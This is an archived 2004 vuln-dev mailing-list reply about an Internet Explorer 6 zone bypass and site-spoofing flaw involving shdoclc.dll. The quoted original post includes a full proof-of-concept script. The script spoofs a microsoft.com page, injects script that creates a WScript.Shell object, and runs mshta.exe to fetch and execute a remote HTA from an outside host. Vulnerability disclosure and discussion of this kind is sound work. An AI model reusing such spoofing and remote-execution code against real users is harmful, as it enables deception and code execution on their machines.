Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing

RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing

From: V. Poddubnyy <vpoddubniy_at_mail.ru>
Date: Tue, 13 Jul 2004 23:09:41 +0400

Hi!

Well, in my fully patched IE 60 (Eng) on Win XP Pro Corporate it asked me
for permission to execute ActiveX, then (I clicked Yes) it said to me that
access was denied in line 20 of your hta. Execution was performed in
Internet zone...

Regards,
 Vladimir

> -----Original Message-----
> From: Bartosz Kwitkowski [mailto:bartosz_at_wb.pl]
> Sent: Tuesday, July 13, 2004 11:30 AM
> To: vuln-dev_at_securityfocus.com
> Subject: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing
>
>
>
> details:
>
> OS: Windows XP Prof (fully patched), IE 6.0
> LANG: Polish (of course).
>
> VULN:
>
> 1.this is zone-by-pass. Opening IE window is in My Computer zone.
> You can paste script into this page and it will be executed as local.
> I think this is very serious vuln.
>
> 2.site spoofing. You can create spoofed link. User when
> clicking will think he is going to for example microsoft.com.
> It will open page with microsoft.com URL in address bar. You
> can paste your own page to this window and user won't know
> this page is spoofed.This is also very serious problem.
>
> EXPLOIT:
>
> <html><body>
> &lt;script&gt;
> klocek = window.open('res://c:\\windows\\system32
> \\shdoclc.dll/http_404.htm#http://www.microsoft.com','_meia');
>
>
> klocek.document.write("<html><head><title>Microsoft.com</title>");
> klocek.document.write("</head><body>Site moved to <a
> href=\"http://wb.pl/bartosz\"> Bartosz Kwitkowski Home Page
> "+"<"+"/a>:-) Vuln by Bartosz Kwitkowski\n");
> klocek.document.write("<"+"script>\n");
> klocek.document.write("alert(\"ATTACKING!\");\n");
>
> klocek.document.write("var wsh=new
> ActiveXObject('WScript.Shell');\n");
> klocek.document.write("wsh.Run('mshta.exe
> http://wb.pl/bartosz/hta/start2.hta');\n");
>
> klocek.document.write("<"+"/script>\n");
> klocek.document.write("</body></html>\n");
>
>
> &lt;/script&gt;
> </body></html>
>
> ----end--------
>
> This is safe exploit so you can execute it if you want...
> start2.hta contains script which changes your C: disk label
> to "new label".
>
> PS: Sorry my English, but... :-)
>
> Best regards,
> Bartosz Kwitkowski
>
Received on Jul 14 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos